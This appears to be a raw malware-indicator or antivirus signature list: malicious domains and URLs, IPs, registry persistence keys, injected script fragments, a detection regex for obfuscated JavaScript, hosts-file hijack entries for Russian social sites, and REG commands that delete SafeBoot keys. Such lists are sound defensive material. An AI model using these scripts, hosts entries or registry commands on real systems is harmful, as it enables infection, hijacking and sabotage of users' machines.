supernun.ru
supernil.ru
supernewstuff.ru
supernetbet.ru
supermyweb.ru
superhometours.ru
superhomeschool.ru
superhighest.ru
superaguide.ru
sugaryhome.ru
suesite.ru
sportwebnet.ru
soul-in-you.ru
smert-vest.ru
smartgaragesale.ru
sitesages.ru
sitedesigninc.ru
simpleworldhouse.ru
simplehomelink.ru
serialarchive.ru
seamscreative.info
saletradeonline.ru
rentbesthome.ru
regaught.ru
redtagjewelry.ru
redtagcruises.ru
redtagcentral.ru
recentmexico.ru
qualitysuper.ru
protechradio.ru
privius-life.ru
previouslife.ru
poxudeli.ru
pornomig.ru
popcorn-tv.ru
piezenia.ru
pieeonline.ru
ourfreesite.ru
orderseasilver.ru
oneanotherlife.ru
officialohsupplies.ru
obmanulis.ru
nowhomecare.ru
newworldlink.ru
newwaronline.ru
newvillagefresh.ru
newsourceworld.ru
newhomeline.ru
newgolfonline.ru
newcitymap.ru
netmusicbank.ru
myworldcampus.ru
myskysite.ru
myownage.ru
mygreatsale.ru
mycontentguide.ru
musicboxpro.ru
moviehit.ru
moremindpower.ru
mingleas.ru
mindgameworks.ru
mediatagonline.ru
maxserviceworld.ru
manbest.ru
lulucabana.com
ljinet.ru
linuxwebcam.ru
limowebcam.ru
libprojet.ru
letterssite.ru
lagworld.ru
kindpea.ru
jthek.ru
johnsite.ru
jerseyhomesite.ru
innewterra.ru
indiawebnet.ru
illsite.ru
icq-antivirus.ru
huzzahwebdesign.ru
huntalong.ru
hXXp://zerosmak-kiev-ua.1gb.ua/
hXXp://zeraa-com-ua.1gb.ua/
hXXp://whhothatgirl-kiev-ua.1gb.ua/
hXXp://unb0rn.biz/
hXXp://toldspeak.com/
hXXp://tiltandgrin.com/
hXXp://promajik.com/
hXXp://piazzacreative.com/
hXXp://panhandlepointers.com/
hXXp://mvblaw.com/
hXXp://mabcom.net/
hXXp://lendermedia.com/images/z.htm
hXXp://kendoaruba.net/
hXXp://iritirlast0.co.cc/
hXXp://holcombewaller.com/
hXXp://govos-com-ua.1gb.ua/
hXXp://fixuss.bravehost.com/
hXXp://ereintza.com/
hXXp://dwmmanagement.com/
hXXp://dottiehope.com/
hXXp://dextersss-com-ua.1gb.ua/
hXXp://alumicool.com/
hXXp://3torres.com/
hXXp://12s83.com/
hotnewguide.ru
homeusaonline.ru
homesweetnetwork.ru
homesiteworld.ru
homesitedesigns.ru
homesaleplus.ru
homeproair.ru
homehousemiami.ru
homegreatloans.ru
homecarenation.ru
homebuyerscd.ru
highestdog.ru
halfsite.ru
guiderose.ru
guidebat.ru
gridrevolutions.ru
greenscometrue.ru
greatwebradio.ru
greatvelocity.ru
greatsalecenter.ru
greatcarscity.ru
goldgolfbag.ru
gethomesite.ru
genuinenorth.ru
genuinehollywood.ru
genuineholly wood.ru
genuinecolors.ru
genuinecol ors.ru
gametopsite.ru
funwebmail.ru
freewebship.ru
freeprosports.ru
freemindlive.ru
forhomessale.ru
foresaleonline.ru
forallpro.ru
flywebcam.ru
ezsalebuy.ru
ezpoh.ru
extrafreeweb.ru
euroshares.ru
erogod.ru
egreatsale.ru
easytabletennis.ru
easymusicstore.ru
easylifedirect.ru
dub-dubom.ru
directscsi.ru
digitalsiteonline.ru
dietichka.ru
cybercityworld.ru
counterbest.ru
comingbig.ru
cometruestar.ru
cobalttrueblue.ru
cityhomesaustin.ru
cherrypieusa.ru
carswebnet.ru
carprotech.ru
busop.info
burkewebservices.ru
buejackmusic.ru
brownbagbar.ru
boardsaw.ru
blueseaguide.ru
bluejackmusic.ru
bluejackin.ru
blackseatrade.ru
biltop.ru
besttechhome.ru
beststyleweb.ru
bestsis.ru
bestseasilver.ru
bestnewsmall.ru
bestnewhaven.ru
bestmedpro.ru
bestlifeusa.ru
bestjackoff.ru
bestcia.ru
bestbondsite.ru
bestbob.ru
bestartsale.ru
beachdoo.ru
battop.ru
avattop.ru
authentictype.ru
atwebhost.ru
aohna.ru
anycitytown.ru
antivirusicq.ru
anti-virus2010.ru
ampsguide.ru
allpropro.ru
allbagshop.ru
accurategenuine.ru
/script><script"readme.eml", null,"resizable=no,top=6000,left=6000")window.open(
/script><scriptx68x74x74x70x3ax2fx2fx67x6fx2ex6bx69x73x73x78x2ex72x75x2fdocument.createElement(
</script><scriptOx[a-z0-9]{3}\x29\;\x7dcatch\x28Ox[a-z0-9]{3}\x29\x7b[A-Za-z0-9_]{1,64}=unescape\x28String\.fromCharCode\x28[0-9]{1,3}\x2bMath\.round\x28Ox[a-z0-9]{3}\.message\x29\x29\x2b[A-Za-z0-9_]{1,64}\x28Ox[a-z0-9]{3}\.message\x2b[0-9]{1,3}\x29\x29\;[A-Za-z0-9_]{1,64}=[A-Za-z0-9_]{1,64}\x28[A-Za-z0-9_]{1,64}\x29\;[A-Za-z0-9_]{1,64}=eval\x7d[A-Za-z0-9_]{1,64}\x28unescape\x28[A-Za-z0-9_]{1,64}\x29\x29\;
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\windows\system32\userinit.exe,
%SYSTEM%\userinit.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
7"7.reloc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nwsapagent
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ias
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4
\bin\dcc32.exe"uses windows;
</script><scripton error resume nexthXXp://VVV.yuyu.com/?fav2
hXXp://VVV.wdheaven.cn/
hXXp://VVV.thysearch.net
hXXp://VVV.quary888.cn/
hXXp://VVV.musicmoa.net/
hXXp://VVV.membres.lycos.fr/chouhacasa/
hXXp://VVV.membres.lycos.fr/bmwvir/
hXXp://VVV.freewebtown.com/crman/
hXXp://VVV.82vv.com/
hXXp://VVV.77zb.com/
hXXp://VVV.6783.com/?u2
hXXp://VVV.223224.com/taobao/
hXXp://VVV.17oye.cn/
hXXp://wa3ra.110mb.com/
hXXp://volam111.110mb.com/
hXXp://thoidep.com/
hXXp://test004.adultsexual.info/
hXXp://ro7ei.com/
hXXp://rmksa.com/
hXXp://qgi.org.sa/
hXXp://ms-dl-center3699.info/
hXXp://moxulica.evonet.ro/
hXXp://members.lycos.co.uk/sauytre00/
hXXp://laylalesb.sitesled.com/
hXXp://lauxanhus.110mb.com/
hXXp://italiandirectory.com/
hXXp://images2008.8866.org/
hXXp://files.myopera.com/roball/
hXXp://diendansinhvienvnn.com/
hXXp://dichvum4g.net/
hXXp://43leloi43.110mb.com/
hXXp://194.160.227.34/
hXXp://133666620.host.dj58.net/
208.109.220.95
173.236.97.27
173.201.254.6
64.117.35.255
127.0.0.1 localhost
Host file has been infected by :W32.Depkominfo.A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
'))</script>\/\/\o\n\l\y\f\i\n\d\.\n\e\t\/\i\n\.\c\g\i\?<script>eval(unescape(
1\$ 1\$(1\$,1\$03
kernel32.dll
.mdata
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\A-
%SYSTEM%\Tasks\A-
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\net /f
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\net HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network /s
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\mini /f
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\mini HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal /s
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\jjonjo HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network /s
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\HashVsSTDTest
HKEY_LOCAL_MACHINE\SOFTWARE\HashVsSTDTest
\Temp\UuU.uUu
\TEMP\XxX.xXx
firefox
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
ParseAutoexec
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
{CAB8D20A-31A9-4505-AD1B-6014A0F32D9D}
{1EBE9E45-C4BB-4B2A-84CA-7257C9D28992}
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Classes\.exe
HKEY_CURRENT_USER\Software\CryptoLocker_0388
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows Search\Gather\Windows\SystemIndex\Crawls\27\
HKCU\softwaremicrosoftwindowscurrentversionpoliciesexplorer
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKCU\Software\Policies\Microsoft\Windows NT\Terminal Services
SCRNSAVE.EXE
HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Windows
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
NoChangeKeyboardNavigationIndicators
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
rundll32.exe
.txt,
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
%WINDOWS%\Active.bat
SkypeAutoConect.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNSService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPPortMapService
.dspak
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87}
%APPDATA%\Microsoft\Windows\xGgUF
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Host-process Windows (Rundll32.exe)
Service Host Process for Windows
WINDOWS SYSTEM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
198.175.125.141 sotialmonstercookie.ru
198.175.125.141 m.ok.ru
198.175.125.141 m.odnoklassniki.ru
198.175.125.141 odnoklassniki.ru
198.175.125.141 m.vk.com
198.175.125.141 m.my.mail.ru
198.175.125.141 my.mail.ru
198.175.125.141 ok.ru
198.175.125.141 VVV.odnoklassniki.ru
198.175.125.141 vk.com
WINDOWS NT SERVICE
[1 5 7 17]
%WINDOWS%\TASKS\FLASHDRV.JOB
.exe.exe
.ndata
%SYSTEM%\drivers\etc\h
T.TEQUILA
4ffffuser32.dll
advapi32.dll
mpr.dllffffuser32.dll
mpr.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Aasppapmmxkvs
KERNEL32.dll
<w.uT
.UPX0
.vmp1
.vmp0
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions present
HKEY_CLASSES_ROOT\batfile\shell\open\command
HKEY_CLASSES_ROOT\VBSFile\Shell\Open2\Command
HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command
HKEY_CLASSES_ROOT\VBEFile\Shell\Open2\Command
HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command
HKEY_CLASSES_ROOT\scrfile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
HKEY_CLASSES_ROOT\exefile\shell\open\command
%SystemRoot%\System32\CScript.exe "%1" %*
%SystemRoot%\System32\WScript.exe "%1" %*
%WINDOWS%
%PROGRAMS%\Foto.lnk
%DESKTOPDIRECTORY%\Foto.lnk
%PROGRAMS%\SUPER CONTENUTI.lnk
%DESKTOPDIRECTORY%\SUPER CONTENUTI.lnk
%PROGRAMS%\Club del Vizio - Foto Video Calendari - VM18.lnk
%DESKTOPDIRECTORY%\Club del Vizio - Foto Video Calendari - VM18.lnk
%SYSTEM%\winxtx
%SYSTEM%\Winsystens
%SYSTEM%\Winsysten
%SYSTEM%\Winsystemt
%SYSTEM%\Winsystemq
%SYSTEM%\Winsystempo
%SYSTEM%\Winsystemp
%SYSTEM%\Winsystemm
%SYSTEM%\Winsysteml
%SYSTEM%\Winsystemk
%SYSTEM%\Winsystemc
%SYSTEM%\Winsystemas
%SYSTEM%\Winsystem
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
{C7E341C1-655B-48EB-9FCC-5B56B4A96121}
{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping
{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DDF887BD-D021-4E54-ABC9-550A6FDCFA7F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CDDFA4C7-FB54-493B-B751-99591FC0DD63}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AF866D80-2D98-49B9-A1F4-B8061C7E2C42}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{99767248-6535-4064-A342-48DCBBFEDE21}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75CBFD0C-1513-4288-A5A9-F3D6C7DDD342}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6778D566-49BD-466D-9386-DD74E6AF5A23}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6725959F-EB01-4AA3-B75E-2E75E806C825}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{497F4F5A-5665-483B-8CD2-565750DEE151}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3C368A69-8A30-4B49-8451-FF65636F123A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1CA02EA2-55E6-429A-8246-A25AD3106C6F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{C7E341C1-655B-48EB-9FCC-5B56B4A96121}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
HKEY_LOCAL_MACHINE\SOFTWARE\Freeware\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Freeware\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Freeware\{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
DisableCMD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
symldrv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
DontReportInfectionInformation
explorer.exe
Explorer.exe %WINDIR%\system32\drivers\service.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{F2C63239-A5DB-487B-B283-4132351E7AB6}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
hXXp://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\
hXXp://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
hXXp://VVV.baidu.com/index.php?tn=mm667_pg
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
eHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe
%SystemRoot%
C:\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
%SystemRoot%\System32\drivers\etc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
dmboot.sys
dmload.sys
sermouse.sys
vga.sys
Keyboard
{36FC9E60-C465-11CF-8056-444553540000}
{4D36E965-E325-11CE-BFC1-08002BE10318}
{4D36E969-E325-11CE-BFC1-08002BE10318}
{4D36E96A-E325-11CE-BFC1-08002BE10318}
{4D36E96B-E325-11CE-BFC1-08002BE10318}
{4D36E977-E325-11CE-BFC1-08002BE10318}
{4D36E97B-E325-11CE-BFC1-08002BE10318}
{4D36E97D-E325-11CE-BFC1-08002BE10318}
{71A27CDD-812A-11D0-BEC7-08002BE2092F}
{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}
Tcpip
dmio.sys
rdpcdd.sys
rdpwd.sys
tdpipe.sys
tdtcp.sys
vgasave.sys
sr.sys
{4D36E967-E325-11CE-BFC1-08002BE10318}
{4D36E96F-E325-11CE-BFC1-08002BE10318}
{4D36E972-E325-11CE-BFC1-08002BE10318}
{4D36E974-E325-11CE-BFC1-08002BE10318}
{4D36E975-E325-11CE-BFC1-08002BE10318}
{4D36E980-E325-11CE-BFC1-08002BE10318}
t\system32\sfcfiles.dat
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\sr\Parameters
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
"%Program Files%\Internet Explorer\IEXPLORE.EXE"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command
"%Program Files%\Internet Explorer\IEXPLORE.EXE" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command
"%SystemRoot%\winhlp32.exe" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command
"%SystemRoot%\hh.exe" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command
regedit.exe "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
%SystemRoot%\system32\NOTEPAD.EXE %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
%SYSTEM%\winupdate86.exe
%SYSTEM%\winlogon86.exe
%SYSTEM%\winhelper86.dll
%SYSTEM%\critical_warning.html
%SYSTEM%\AVR10.exe
%SYSTEM%\41.exe
wdmaud.drv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
smss32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
%System%\winlogon32.exe
%WinDir%\SYSTEM32\USERINIT.exe,
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command\
HKEY_CLASSES_ROOT\secfile
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\shell
HKEY_CLASSES_ROOT\.exe\DefaultIcon
HKEY_CLASSES_ROOT\txtfile\shell\open\command
%WINDOWS%\OK.ini
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
securityGuard.exe
SAa34e.exe
MSW.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
HKEY_CLASSES_ROOT\securityGuard.DocHostUIHandler
HKEY_CLASSES_ROOT\securityGuard.DocHostUIHandler\Clsid
HKEY_CLASSES_ROOT\SAa34e.DocHostUIHandler
HKEY_CLASSES_ROOT\SAa34e.DocHostUIHandler\Clsid
HKEY_CLASSES_ROOT\MSW.DocHostUIHandler
HKEY_CLASSES_ROOT\CLSID\
HKEY_CLASSES_ROOT\MSW.DocHostUIHandler\Clsid
CheckExeSignatures
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
hXXp://search-gala.com
hXXp://findgala.com
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
svchost.exe
explorer.exe rundll32.exe nynw.wmo mynleeq
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
VPTRAY.EXE
USBGUARD.EXE
regedit.exe
pctstray.exe
pctsgui.exe
msconfig.exe
mmc.exe
AVP.EXE
AVGNT.EXE
ashdisp.exe
HKEY_CURRENT_USER\Software\vlad
\SYSTEM32\USERINIT.EXE,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dfcsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
HKEY_LOCAL_MACHINE\Software\Classes\.exe\shell
HKEY_CURRENT_USER\Software\Classes\.exe\shell
HKEY_LOCAL_MACHINE\Software\Classes\secfile
HKEY_CURRENT_USER\Software\Classes\secfile
HKEY_CURRENT_USER\Software\Win Antispyware Center
explorer.exe rundll32.exe thxr.wgo nwfdtx
{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D.1\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D\CLSID
{2D046A82-BED0-36C5-85BC-4BC759C9C472}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2D046A82-BED0-36C5-85BC-4BC759C9C472}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D046A82-BED0-36C5-85BC-4BC759C9C472}
rundll32 svchost.dll,get
rundll32 csrrss.dll,get
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2BA40A2-75F1-51BD-F413-04B15A2C8950}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.dll, RestoreWindows
mcexecwin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
,93.188.16
93.188.16
255.255.255.255
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
Explorer.exe
csrss.exe
c:\windows\csrss.exe
%WINDOWS%\csrss.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xmlprov\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_XMLPROV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_XMLPROV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSN\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPNPHOST
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPNPHOST\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtmsSvc\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTMSSVC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTMSSVC\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_APPMGMT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_APPMGMT\0000
{8ECC055D-047F-11D1-A537-0000F8753ED1}
